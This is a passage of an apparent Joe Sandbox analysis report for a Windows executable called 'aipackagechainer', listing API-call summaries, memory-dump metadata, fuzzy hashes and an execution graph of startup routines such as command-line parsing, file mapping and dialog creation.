                                          • Opcode Fuzzy Hash: d92599fd293ee666a0ac1ba7a6687df167ccc6d8934efc21d5db8fc4887bcd13
                                          • Instruction Fuzzy Hash: 4881D1B2E002059FE714DF58C840BAAB7E4FF51320F15866DE8199B381D779EE448BD4
                                          APIs
                                            • Part of subcall function 000C93D0: SetEvent.KERNEL32(00000002,?,?,000C36BF,D11C52E5), ref: 000C93E6
                                            • Part of subcall function 000C93D0: GetLastError.KERNEL32(?,?,000C36BF,D11C52E5), ref: 000C93F0
                                            • Part of subcall function 000C93D0: WaitForSingleObject.KERNEL32(?,000000FF,?,?,000C36BF,D11C52E5), ref: 000C93FC
                                            • Part of subcall function 000C93D0: GetLastError.KERNEL32(?,?,000C36BF,D11C52E5), ref: 000C9407
                                            • Part of subcall function 000C93D0: CloseHandle.KERNEL32(?,?,?,000C36BF,D11C52E5), ref: 000C9411
                                            • Part of subcall function 000C93D0: GetLastError.KERNEL32(?,?,000C36BF,D11C52E5), ref: 000C941B
                                          • GetLastError.KERNEL32 ref: 000C36DC
                                          • GetLastError.KERNEL32 ref: 000C3707
                                          • CloseHandle.KERNEL32(75572EE0,D11C52E5), ref: 000C372C
                                          • GetLastError.KERNEL32 ref: 000C3736
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: ErrorLast$CloseHandle$EventObjectSingleWait
                                          • String ID:
                                          • API String ID: 2212007442-0
                                          • Opcode ID: a29210362d277092ba1270ed03388199e6f6434058cb6efff46861d5b1a818e6
                                          • Instruction ID: c9c18b531507cb8c013da35a0418da70c78b9438e11e1150cbe92a9f73c9ee97
                                          • Opcode Fuzzy Hash: a29210362d277092ba1270ed03388199e6f6434058cb6efff46861d5b1a818e6
                                          • Instruction Fuzzy Hash: A021A3B1904249EBDB24DF69D844B6EFBE8EB04720F20826ED81597780DB75AA00CB91

                                          Execution Graph

                                          Execution Coverage:11.5%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:27
                                          execution_graph 25407 7ff7bb262d6c 25432 7ff7bb2627fc 25407->25432 25410 7ff7bb262eb8 25531 7ff7bb263170 7 API calls 2 library calls 25410->25531 25411 7ff7bb262d88 __scrt_acquire_startup_lock 25413 7ff7bb262ec2 25411->25413 25414 7ff7bb262da6 25411->25414 25532 7ff7bb263170 7 API calls 2 library calls 25413->25532 25416 7ff7bb262dcb 25414->25416 25423 7ff7bb262de8 __scrt_release_startup_lock 25414->25423 25440 7ff7bb26cd90 25414->25440 25418 7ff7bb262ecd abort 25419 7ff7bb262e51 25444 7ff7bb2632bc 25419->25444 25421 7ff7bb262e56 25447 7ff7bb26cd20 25421->25447 25423->25419 25528 7ff7bb26c050 35 API calls __GSHandlerCheck_EH 25423->25528 25533 7ff7bb262fb0 25432->25533 25435 7ff7bb26282b 25535 7ff7bb26cc50 25435->25535 25436 7ff7bb262827 25436->25410 25436->25411 25441 7ff7bb26cdeb 25440->25441 25442 7ff7bb26cdcc 25440->25442 25441->25423 25442->25441 25552 7ff7bb231120 25442->25552 25615 7ff7bb263cf0 25444->25615 25617 7ff7bb270730 25447->25617 25449 7ff7bb262e5e 25452 7ff7bb260754 25449->25452 25451 7ff7bb26cd2f 25451->25449 25621 7ff7bb270ac0 35 API calls _snwprintf 25451->25621 25623 7ff7bb24dfd0 25452->25623 25456 7ff7bb26079a 25710 7ff7bb25946c 25456->25710 25458 7ff7bb2607a4 __scrt_get_show_window_mode 25715 7ff7bb259a14 25458->25715 25460 7ff7bb26096e GetCommandLineW 25463 7ff7bb260980 25460->25463 25503 7ff7bb260b42 25460->25503 25461 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 25462 7ff7bb260de2 25461->25462 25777 7ff7bb267904 25462->25777 25782 7ff7bb23129c 25463->25782 25465 7ff7bb260819 25465->25460 25510 7ff7bb260ddc 25465->25510 25466 7ff7bb260b51 25470 7ff7bb231fa0 31 API calls 25466->25470 25473 7ff7bb260b68 BuildCatchObjectHelperInternal 25466->25473 25470->25473 25472 7ff7bb2609a5 25792 7ff7bb25cad0 103 API calls 3 library calls 25472->25792 25737 7ff7bb231fa0 25473->25737 25474 7ff7bb260b93 SetEnvironmentVariableW GetLocalTime 25742 7ff7bb243e28 25474->25742 25479 7ff7bb2609af 25479->25462 25481 7ff7bb2609f9 OpenFileMappingW 25479->25481 25483 7ff7bb260adb 25479->25483 25484 7ff7bb260a19 MapViewOfFile 25481->25484 25485 7ff7bb260ad0 CloseHandle 25481->25485 25489 7ff7bb23129c 33 API calls 25483->25489 25484->25485 25487 7ff7bb260a3f UnmapViewOfFile MapViewOfFile 25484->25487 25485->25503 25487->25485 25490 7ff7bb260a71 25487->25490 25493 7ff7bb260b00 25489->25493 25793 7ff7bb25a190 33 API calls 2 library calls 25490->25793 25491 7ff7bb260c75 25770 7ff7bb2567b4 25491->25770 25797 7ff7bb25fd0c 35 API calls 2 library calls 25493->25797 25497 7ff7bb260a81 25794 7ff7bb25fd0c 35 API calls 2 library calls 25497->25794 25498 7ff7bb2567b4 33 API calls 25501 7ff7bb260c87 DialogBoxParamW 25498->25501 25499 7ff7bb260b0a 25499->25503 25505 7ff7bb260dd7 25499->25505 25511 7ff7bb260cd3 25501->25511 25502 7ff7bb260a90 25795 7ff7bb24b9b4 102 API calls 25502->25795 25725 7ff7bb246454 25503->25725 25507 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 25505->25507 25506 7ff7bb260aa5 25796 7ff7bb24bb00 102 API calls 25506->25796 25507->25510 25509 7ff7bb260ab8 25514 7ff7bb260ac7 UnmapViewOfFile 25509->25514 25510->25461 25512 7ff7bb260cec 25511->25512 25513 7ff7bb260ce6 Sleep 25511->25513 25515 7ff7bb260cfa 25512->25515 25798 7ff7bb259f4c 49 API calls 2 library calls 25512->25798 25513->25512 25514->25485 25517 7ff7bb260d06 DeleteObject 25515->25517 25518 7ff7bb260d25 25517->25518 25519 7ff7bb260d1f DeleteObject 25517->25519 25520 7ff7bb260d5b 25518->25520 25521 7ff7bb260d6d 25518->25521 25519->25518 25799 7ff7bb25fe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 25520->25799 25773 7ff7bb2594e4 25521->25773 25523 7ff7bb260d60 CloseHandle 25523->25521 25528->25419 25531->25413 25532->25418 25534 7ff7bb26281e __scrt_dllmain_crt_thread_attach 25533->25534 25534->25435 25534->25436 25536 7ff7bb270d4c 25535->25536 25537 7ff7bb262830 25536->25537 25540 7ff7bb26ec00 25536->25540 25537->25436 25539 7ff7bb2651a0 7 API calls 2 library calls 25537->25539 25539->25436 25551 7ff7bb26f398 EnterCriticalSection 25540->25551 25557 7ff7bb2391c8 25552->25557 25556 7ff7bb262a01 25556->25442 25565 7ff7bb2456a4 25557->25565 25559 7ff7bb2391df 25568 7ff7bb24b788 25559->25568 25563 7ff7bb231130 25564 7ff7bb2629bc 34 API calls 25563->25564 25564->25556 25574 7ff7bb2456e8 25565->25574 25583 7ff7bb2313a4 25568->25583 25571 7ff7bb239a28 25572 7ff7bb2456e8 2 API calls 25571->25572 25573 7ff7bb239a36 25572->25573 25573->25563 25575 7ff7bb2456fe __scrt_get_show_window_mode 25574->25575 25578 7ff7bb24eba4 25575->25578 25581 7ff7bb24eb58 GetCurrentProcess GetProcessAffinityMask 25578->25581 25582 7ff7bb2456de 25581->25582 25582->25559 25584 7ff7bb2313ad 25583->25584 25592 7ff7bb23142d 25583->25592 25585 7ff7bb23143d 25584->25585 25586 7ff7bb2313ce 25584->25586 25603 7ff7bb232018 33 API calls std::_Xinvalid_argument 25585->25603 25588 7ff7bb2313db __scrt_get_show_window_mode 25586->25588 25593 7ff7bb2621d0 25586->25593 25602 7ff7bb23197c 31 API calls _invalid_parameter_noinfo_noreturn 25588->25602 25592->25571 25594 7ff7bb2621db 25593->25594 25595 7ff7bb2621f4 25594->25595 25597 7ff7bb2621fa 25594->25597 25604 7ff7bb26bbc0 25594->25604 25595->25588 25598 7ff7bb262205 25597->25598 25607 7ff7bb262f7c RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 25597->25607 25608 7ff7bb231f80 33 API calls 3 library calls 25598->25608 25601 7ff7bb26220b 25602->25592 25609 7ff7bb26bc00 25604->25609 25607->25598 25608->25601 25614 7ff7bb26f398 EnterCriticalSection 25609->25614 25616 7ff7bb2632d3 GetStartupInfoW 25615->25616 25616->25421 25618 7ff7bb27073d 25617->25618 25619 7ff7bb270749 25617->25619 25622 7ff7bb270570 48 API calls 5 library calls 25618->25622 25619->25451 25621->25451 25622->25619 25800 7ff7bb262450 25623->25800 25626 7ff7bb24e07b 25628 7ff7bb24e503 25626->25628 25842 7ff7bb26b788 39 API calls 2 library calls 25626->25842 25627 7ff7bb24e026 GetProcAddress 25629 7ff7bb24e03b 25627->25629 25630 7ff7bb24e053 GetProcAddress 25627->25630 25633 7ff7bb246454 34 API calls 25628->25633 25629->25630 25630->25626 25631 7ff7bb24e068 25630->25631 25631->25626 25634 7ff7bb24e50c 25633->25634 25802 7ff7bb247df4 25634->25802 25635 7ff7bb24e3b0 25635->25628 25637 7ff7bb24e3ba 25635->25637 25638 7ff7bb246454 34 API calls 25637->25638 25639 7ff7bb24e3c3 CreateFileW 25638->25639 25641 7ff7bb24e403 SetFilePointer 25639->25641 25642 7ff7bb24e4f0 CloseHandle 25639->25642 25641->25642 25643 7ff7bb24e41c ReadFile 25641->25643 25644 7ff7bb231fa0 31 API calls 25642->25644 25643->25642 25645 7ff7bb24e444 25643->25645 25644->25628 25646 7ff7bb24e458 25645->25646 25647 7ff7bb24e800 25645->25647 25653 7ff7bb23129c 33 API calls 25646->25653 25858 7ff7bb262624 8 API calls 25647->25858 25649 7ff7bb24e51a 25651 7ff7bb24e53e CompareStringW 25649->25651 25652 7ff7bb23129c 33 API calls 25649->25652 25656 7ff7bb231fa0 31 API calls 25649->25656 25683 7ff7bb24e5cc 25649->25683 25810 7ff7bb2451a4 25649->25810 25815 7ff7bb248090 25649->25815 25819 7ff7bb2432bc 25649->25819 25650 7ff7bb24e805 25651->25649 25652->25649 25655 7ff7bb24e48f 25653->25655 25662 7ff7bb24e4db 25655->25662 25843 7ff7bb24d0a0 33 API calls 25655->25843 25656->25649 25658 7ff7bb24e63a 25659 7ff7bb24e648 25658->25659 25660 7ff7bb24e7c2 25658->25660 25844 7ff7bb247eb0 47 API calls 25659->25844 25664 7ff7bb231fa0 31 API calls 25660->25664 25665 7ff7bb231fa0 31 API calls 25662->25665 25667 7ff7bb24e7cb 25664->25667 25668 7ff7bb24e4e5 25665->25668 25666 7ff7bb24e651 25669 7ff7bb2451a4 9 API calls 25666->25669 25671 7ff7bb231fa0 31 API calls 25667->25671 25673 7ff7bb231fa0 31 API calls 25668->25673 25674 7ff7bb24e656 25669->25674 25670 7ff7bb23129c 33 API calls 25670->25683 25672 7ff7bb24e7d5 25671->25672 25833 7ff7bb262320 25672->25833 25673->25642 25677 7ff7bb24e706 25674->25677 25682 7ff7bb24e661 25674->25682 25675 7ff7bb248090 47 API calls 25675->25683 25678 7ff7bb24da98 48 API calls 25677->25678 25681 7ff7bb24e74b AllocConsole 25678->25681 25680 7ff7bb231fa0 31 API calls 25680->25683 25684 7ff7bb24e755 GetCurrentProcessId AttachConsole 25681->25684 25685 7ff7bb24e6fb 25681->25685 25845 7ff7bb24aae0 25682->25845 25683->25658 25683->25670 25683->25675 25683->25680 25686 7ff7bb2432bc 51 API calls 25683->25686 25687 7ff7bb24e76c 25684->25687 25857 7ff7bb2319e0 31 API calls _invalid_parameter_noinfo_noreturn 25685->25857 25686->25683 25693 7ff7bb24e778 GetStdHandle WriteConsoleW Sleep FreeConsole 25687->25693 25691 7ff7bb24e7b9 ExitProcess 25693->25685 25695 7ff7bb24aae0 48 API calls 25696 7ff7bb24e6ce 25695->25696 25855 7ff7bb24dc2c 33 API calls 25696->25855 25698 7ff7bb24e6da 25856 7ff7bb2319e0 31 API calls _invalid_parameter_noinfo_noreturn 25698->25856 25700 7ff7bb2462dc GetCurrentDirectoryW 25701 7ff7bb246300 25700->25701 25706 7ff7bb24638d 25700->25706 25702 7ff7bb2313a4 33 API calls 25701->25702 25703 7ff7bb24631b GetCurrentDirectoryW 25702->25703 25704 7ff7bb246341 25703->25704 26060 7ff7bb2320b0 25704->26060 25706->25456 25707 7ff7bb24634f 25707->25706 25708 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 25707->25708 25709 7ff7bb2463a9 25708->25709 25711 7ff7bb24dd88 25710->25711 25712 7ff7bb259481 OleInitialize 25711->25712 25713 7ff7bb2594a7 25712->25713 25714 7ff7bb2594cd SHGetMalloc 25713->25714 25714->25458 25716 7ff7bb259a4e BuildCatchObjectHelperInternal 25715->25716 25717 7ff7bb259a49 25715->25717 25719 7ff7bb231fa0 31 API calls 25716->25719 25721 7ff7bb259a7d BuildCatchObjectHelperInternal 25716->25721 25718 7ff7bb231fa0 31 API calls 25717->25718 25718->25716 25719->25721 25720 7ff7bb231fa0 31 API calls 25722 7ff7bb259aac BuildCatchObjectHelperInternal 25720->25722 25721->25720 25721->25722 25723 7ff7bb231fa0 31 API calls 25722->25723 25724 7ff7bb259adb BuildCatchObjectHelperInternal 25722->25724 25723->25724 25724->25465 25726 7ff7bb2313a4 33 API calls 25725->25726 25727 7ff7bb246489 25726->25727 25728 7ff7bb24648c GetModuleFileNameW 25727->25728 25731 7ff7bb2464dc 25727->25731 25729 7ff7bb2464a7 25728->25729 25730 7ff7bb2464de 25728->25730 25729->25727 25730->25731 25732 7ff7bb23129c 33 API calls 25731->25732 25734 7ff7bb246506 25732->25734 25733 7ff7bb24653e 25733->25466 25734->25733 25735 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 25734->25735 25736 7ff7bb246560 25735->25736 25738 7ff7bb231fdc 25737->25738 25739 7ff7bb231fb3 25737->25739 25738->25474 25739->25738 25740 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 25739->25740 25741 7ff7bb232000 25740->25741 25743 7ff7bb243e4d swprintf 25742->25743 25744 7ff7bb269ef0 swprintf 46 API calls 25743->25744 25745 7ff7bb243e69 SetEnvironmentVariableW GetModuleHandleW LoadIconW 25744->25745 25746 7ff7bb25b014 LoadBitmapW 25745->25746 25747 7ff7bb25b03e 25746->25747 25748 7ff7bb25b046 25746->25748 26065 7ff7bb258624 FindResourceW 25747->26065 25749 7ff7bb25b04e GetObjectW 25748->25749 25750 7ff7bb25b063 25748->25750 25749->25750 26079 7ff7bb25849c 25750->26079 25754 7ff7bb25b0ce 25765 7ff7bb2498ac 25754->25765 25755 7ff7bb25b09e 26084 7ff7bb258504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25755->26084 25756 7ff7bb258624 10 API calls 25758 7ff7bb25b08a 25756->25758 25758->25755 25760 7ff7bb25b092 DeleteObject 25758->25760 25759 7ff7bb25b0a7 26085 7ff7bb2584cc 25759->26085 25760->25755 25764 7ff7bb25b0bf DeleteObject 25764->25754 26092 7ff7bb2498dc 25765->26092 25767 7ff7bb2498ba 26159 7ff7bb24a43c GetModuleHandleW FindResourceW 25767->26159 25769 7ff7bb2498c2 25769->25491 25771 7ff7bb2621d0 33 API calls 25770->25771 25772 7ff7bb2567fa 25771->25772 25772->25498 25774 7ff7bb259501 25773->25774 25775 7ff7bb25950a OleUninitialize 25774->25775 25776 7ff7bb29e330 25775->25776 26241 7ff7bb26783c 31 API calls 2 library calls 25777->26241 25779 7ff7bb26791d 26242 7ff7bb267934 16 API calls abort 25779->26242 25783 7ff7bb2312d0 25782->25783 25789 7ff7bb23139b 25782->25789 25786 7ff7bb231338 25783->25786 25787 7ff7bb231396 25783->25787 25791 7ff7bb2312de BuildCatchObjectHelperInternal 25783->25791 25790 7ff7bb2621d0 33 API calls 25786->25790 25786->25791 26243 7ff7bb231f80 33 API calls 3 library calls 25787->26243 26244 7ff7bb232004 33 API calls std::_Xinvalid_argument 25789->26244 25790->25791 25791->25472 25792->25479 25793->25497 25794->25502 25795->25506 25796->25509 25797->25499 25798->25515 25799->25523 25801 7ff7bb24dff4 GetModuleHandleW 25800->25801 25801->25626 25801->25627 25803 7ff7bb247e0c 25802->25803 25804 7ff7bb247e55 25803->25804 25805 7ff7bb247e23 25803->25805 25859 7ff7bb23704c 47 API calls BuildCatchObjectHelperInternal 25804->25859 25807 7ff7bb23129c 33 API calls 25805->25807 25809 7ff7bb247e47 25807->25809 25808 7ff7bb247e5a 25809->25649 25811 7ff7bb2451c8 GetVersionExW 25810->25811 25812 7ff7bb2451fb 25810->25812 25811->25812 25813 7ff7bb262320 _handle_error 8 API calls 25812->25813 25814 7ff7bb245228 25813->25814 25814->25649 25816 7ff7bb2480a5 25815->25816 25860 7ff7bb248188 25816->25860 25818 7ff7bb2480ca 25818->25649 25820 7ff7bb2432e7 GetFileAttributesW 25819->25820 25821 7ff7bb2432e4 25819->25821 25822 7ff7bb2432f8 25820->25822 25830 7ff7bb243375 25820->25830 25821->25820 25869 7ff7bb246a0c 25822->25869 25823 7ff7bb262320 _handle_error 8 API calls 25825 7ff7bb243389 25823->25825 25825->25649 25827 7ff7bb24333c 25829 7ff7bb243399 25827->25829 25827->25830 25828 7ff7bb243323 GetFileAttributesW 25828->25827 25831 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 25829->25831 25830->25823 25832 7ff7bb24339e 25831->25832 25834 7ff7bb262329 25833->25834 25835 7ff7bb262550 IsProcessorFeaturePresent 25834->25835 25836 7ff7bb24e7e4 25834->25836 25837 7ff7bb262568 25835->25837 25836->25700 25959 7ff7bb262744 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 25837->25959 25839 7ff7bb26257b 25960 7ff7bb262510 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 25839->25960 25842->25635 25843->25655 25844->25666 25846 7ff7bb24aaf3 25845->25846 25961 7ff7bb249774 25846->25961 25849 7ff7bb24ab58 LoadStringW 25850 7ff7bb24ab86 25849->25850 25851 7ff7bb24ab71 LoadStringW 25849->25851 25852 7ff7bb24da98 25850->25852 25851->25850 25987 7ff7bb24d874 25852->25987 25855->25698 25856->25685 25857->25691 25858->25650 25859->25808 25861 7ff7bb2481ba 25860->25861 25862 7ff7bb248326 25860->25862 25866 7ff7bb2481d4 BuildCatchObjectHelperInternal 25861->25866 25867 7ff7bb2458a4 33 API calls 2 library calls 25861->25867 25868 7ff7bb23704c 47 API calls BuildCatchObjectHelperInternal 25862->25868 25864 7ff7bb24832b 25866->25818 25867->25866 25868->25864 25870 7ff7bb246a4b 25869->25870 25871 7ff7bb246a44 25869->25871 25874 7ff7bb23129c 33 API calls 25870->25874 25872 7ff7bb262320 _handle_error 8 API calls 25871->25872 25873 7ff7bb24331f 25872->25873 25873->25827 25873->25828 25875 7ff7bb246a76 25874->25875 25876 7ff7bb246cc7 25875->25876 25877 7ff7bb246a96 25875->25877 25878 7ff7bb2462dc 35 API calls 25876->25878 25879 7ff7bb246b49 25877->25879 25880 7ff7bb246ab0 25877->25880 25882 7ff7bb246ce6 25878->25882 25884 7ff7bb246b44 25879->25884 25906 7ff7bb23129c 33 API calls 25879->25906 25905 7ff7bb2470ab 25880->25905 25942 7ff7bb23c098 33 API calls 2 library calls 25880->25942 25883 7ff7bb246eef 25882->25883 25882->25884 25887 7ff7bb246d1b 25882->25887 25926 7ff7bb2470cf 25883->25926 25951 7ff7bb23c098 33 API calls 2 library calls 25883->25951 25884->25871 25885 7ff7bb2470b1 25884->25885 25892 7ff7bb2470d5 25884->25892 25894 7ff7bb2470a6 25884->25894 25891 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 25885->25891 25918 7ff7bb2470bd 25887->25918 25945 7ff7bb23c098 33 API calls 2 library calls 25887->25945 25901 7ff7bb2470b7 25891->25901 25893 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 25892->25893 25902 7ff7bb2470db 25893->25902 25900 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 25894->25900 25895 7ff7bb246b03 25903 7ff7bb231fa0 31 API calls 25895->25903 25907 7ff7bb246b15 BuildCatchObjectHelperInternal 25895->25907 25896 7ff7bb246f56 25952 7ff7bb2311cc 33 API calls BuildCatchObjectHelperInternal 25896->25952 25898 7ff7bb2470c3 25910 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 25898->25910 25899 7ff7bb231fa0 31 API calls 25899->25884 25900->25905 25911 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 25901->25911 25913 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 25902->25913 25903->25907 25954 7ff7bb232004 33 API calls std::_Xinvalid_argument 25905->25954 25914 7ff7bb246bbe 25906->25914 25907->25899 25908 7ff7bb246f69 25953 7ff7bb2457ac 33 API calls BuildCatchObjectHelperInternal 25908->25953 25916 7ff7bb2470c9 25910->25916 25911->25918 25912 7ff7bb231fa0 31 API calls 25924 7ff7bb246df5 25912->25924 25919 7ff7bb2470e1 25913->25919 25943 7ff7bb245820 33 API calls 25914->25943 25956 7ff7bb23704c 47 API calls BuildCatchObjectHelperInternal 25916->25956 25917 7ff7bb246d76 BuildCatchObjectHelperInternal 25917->25898 25917->25912 25955 7ff7bb232004 33 API calls std::_Xinvalid_argument 25918->25955 25920 7ff7bb246bd3 25944 7ff7bb23e164 33 API calls 2 library calls 25920->25944 25923 7ff7bb231fa0 31 API calls 25927 7ff7bb246fec 25923->25927 25928 7ff7bb246e21 25924->25928 25946 7ff7bb231744 33 API calls 4 library calls 25924->25946 25925 7ff7bb246f79 BuildCatchObjectHelperInternal 25925->25902 25925->25923 25957 7ff7bb232004 33 API calls std::_Xinvalid_argument 25926->25957 25929 7ff7bb231fa0 31 API calls 25927->25929 25928->25916 25934 7ff7bb23129c 33 API calls 25928->25934 25932 7ff7bb246ff6 25929->25932 25931 7ff7bb231fa0 31 API calls 25936 7ff7bb246c6d 25931->25936 25933 7ff7bb231fa0 31 API calls 25932->25933 25933->25884 25938 7ff7bb246ec2 25934->25938 25935 7ff7bb246be9 BuildCatchObjectHelperInternal 25935->25901 25935->25931 25937 7ff7bb231fa0 31 API calls 25936->25937 25937->25884 25947 7ff7bb232034 25938->25947 25940 7ff7bb246edf 25941 7ff7bb231fa0 31 API calls 25940->25941 25941->25884 25942->25895 25943->25920 25944->25935 25945->25917 25946->25928 25948 7ff7bb232085 25947->25948 25950 7ff7bb232059 BuildCatchObjectHelperInternal 25947->25950 25958 7ff7bb2315b8 33 API calls 3 library calls 25948->25958 25950->25940 25951->25896 25952->25908 25953->25925 25956->25926 25958->25950 25959->25839 25968 7ff7bb249638 25961->25968 25964 7ff7bb2497d9 25966 7ff7bb262320 _handle_error 8 API calls 25964->25966 25967 7ff7bb2497f2 25966->25967 25967->25849 25967->25850 25969 7ff7bb249692 25968->25969 25977 7ff7bb249730 25968->25977 25971 7ff7bb2496c0 25969->25971 25982 7ff7bb250f68 WideCharToMultiByte 25969->25982 25976 7ff7bb2496ef 25971->25976 25984 7ff7bb24aa88 45 API calls 2 library calls 25971->25984 25972 7ff7bb262320 _handle_error 8 API calls 25973 7ff7bb249764 25972->25973 25973->25964 25978 7ff7bb249800 25973->25978 25985 7ff7bb26a270 31 API calls 2 library calls 25976->25985 25977->25972 25979 7ff7bb249840 25978->25979 25981 7ff7bb249869 25978->25981 25986 7ff7bb26a270 31 API calls 2 library calls 25979->25986 25981->25964 25983 7ff7bb250faa 25982->25983 25983->25971 25984->25976 25985->25977 25986->25981 26003 7ff7bb24d4d0 25987->26003 25992 7ff7bb24d974 26001 7ff7bb24d9a3 25992->26001 26045 7ff7bb239d78 33 API calls 25992->26045 25993 7ff7bb24d8e5 swprintf 25993->25992 26017 7ff7bb269ef0 25993->26017 26044 7ff7bb239d78 33 API calls 25993->26044 25995 7ff7bb24da17 25996 7ff7bb262320 _handle_error 8 API calls 25995->25996 25998 7ff7bb24da2b 25996->25998 25997 7ff7bb24da3f 25999 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 25997->25999 25998->25695 26000 7ff7bb24da44 25999->26000 26001->25995 26001->25997 26004 7ff7bb24d665 26003->26004 26005 7ff7bb24d502 26003->26005 26007 7ff7bb24cb80 26004->26007 26005->26004 26006 7ff7bb231744 33 API calls 26005->26006 26006->26005 26008 7ff7bb24cbb6 26007->26008 26015 7ff7bb24cc80 26007->26015 26009 7ff7bb24cbc6 26008->26009 26012 7ff7bb24cc7b 26008->26012 26014 7ff7bb24cc20 26008->26014 26009->25993 26046 7ff7bb231f80 33 API calls 3 library calls 26012->26046 26014->26009 26016 7ff7bb2621d0 33 API calls 26014->26016 26047 7ff7bb232004 33 API calls std::_Xinvalid_argument 26015->26047 26016->26009 26018 7ff7bb269f4e 26017->26018 26019 7ff7bb269f36 26017->26019 26018->26019 26021 7ff7bb269f58 26018->26021 26048 7ff7bb26d69c 15 API calls abort 26019->26048 26050 7ff7bb267ef0 35 API calls 2 library calls 26021->26050 26022 7ff7bb269f3b 26049 7ff7bb2678e4 31 API calls _invalid_parameter_noinfo_noreturn 26022->26049 26025 7ff7bb269f69 __scrt_get_show_window_mode 26051 7ff7bb267e70 15 API calls _set_fmode 26025->26051 26026 7ff7bb262320 _handle_error 8 API calls 26027 7ff7bb26a10b 26026->26027 26027->25993 26029 7ff7bb269fd4 26052 7ff7bb2682f8 46 API calls 3 library calls 26029->26052 26031 7ff7bb269fdd 26032 7ff7bb269fe5 26031->26032 26033 7ff7bb26a014 26031->26033 26053 7ff7bb26d90c 26032->26053 26035 7ff7bb26a092 26033->26035 26036 7ff7bb26a01a 26033->26036 26038 7ff7bb26a06c 26033->26038 26041 7ff7bb26a023 26033->26041 26035->26038 26039 7ff7bb26a09c 26035->26039 26036->26038 26036->26041 26037 7ff7bb26d90c __free_lconv_num 15 API calls 26043 7ff7bb269f46 26037->26043 26038->26037 26042 7ff7bb26d90c __free_lconv_num 15 API calls 26039->26042 26040 7ff7bb26d90c __free_lconv_num 15 API calls 26040->26043 26041->26040 26042->26043 26043->26026 26044->25993 26045->26001 26046->26015 26048->26022 26049->26043 26050->26025 26051->26029 26052->26031 26054 7ff7bb26d911 RtlRestoreThreadPreferredUILanguages 26053->26054 26058 7ff7bb26d941 __free_lconv_num 26053->26058 26055 7ff7bb26d92c 26054->26055 26054->26058 26059 7ff7bb26d69c 15 API calls abort 26055->26059 26057 7ff7bb26d931 GetLastError 26057->26058 26058->26043 26059->26057 26061 7ff7bb2320f6 26060->26061 26063 7ff7bb2320cb BuildCatchObjectHelperInternal 26060->26063 26064 7ff7bb231474 33 API calls 3 library calls 26061->26064 26063->25707 26064->26063 26066 7ff7bb25864f SizeofResource 26065->26066 26067 7ff7bb25879b 26065->26067 26066->26067 26068 7ff7bb258669 LoadResource 26066->26068 26067->25748 26068->26067 26069 7ff7bb258682 LockResource 26068->26069 26069->26067 26070 7ff7bb258697 GlobalAlloc 26069->26070 26070->26067 26071 7ff7bb2586b8 GlobalLock 26070->26071 26072 7ff7bb258792 GlobalFree 26071->26072 26073 7ff7bb2586ca BuildCatchObjectHelperInternal 26071->26073 26072->26067 26074 7ff7bb258789 GlobalUnlock 26073->26074 26075 7ff7bb2586f6 GdipAlloc 26073->26075 26074->26072 26076 7ff7bb25870b 26075->26076 26076->26074 26077 7ff7bb25875a GdipCreateHBITMAPFromBitmap 26076->26077 26078 7ff7bb258772 26076->26078 26077->26078 26078->26074 26080 7ff7bb2584cc 4 API calls 26079->26080 26081 7ff7bb2584aa 26080->26081 26082 7ff7bb2584b9 26081->26082 26090 7ff7bb258504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26081->26090 26082->25754 26082->25755 26082->25756 26084->25759 26086 7ff7bb2584de 26085->26086 26087 7ff7bb2584e3 26085->26087 26091 7ff7bb258590 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26086->26091 26089 7ff7bb258df4 16 API calls _handle_error 26087->26089 26089->25764 26090->26082 26091->26087 26095 7ff7bb2498fe _snwprintf 26092->26095 26093 7ff7bb249973 26210 7ff7bb2468b0 48 API calls 26093->26210 26095->26093 26096 7ff7bb249a89 26095->26096 26099 7ff7bb2499fd 26096->26099 26102 7ff7bb2320b0 33 API calls 26096->26102 26097 7ff7bb231fa0 31 API calls 26097->26099 26098 7ff7bb24997d BuildCatchObjectHelperInternal 26098->26097 26100 7ff7bb24a42e 26098->26100 26161 7ff7bb2424c0 26099->26161 26101 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26100->26101 26103 7ff7bb24a434 26101->26103 26102->26099 26106 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26103->26106 26108 7ff7bb24a43a 26106->26108 26107 7ff7bb249a22 26110 7ff7bb24204c 100 API calls 26107->26110 26109 7ff7bb249b17 26179 7ff7bb26a450 26109->26179 26112 7ff7bb249a2b 26110->26112 26112->26103 26115 7ff7bb249a66 26112->26115 26114 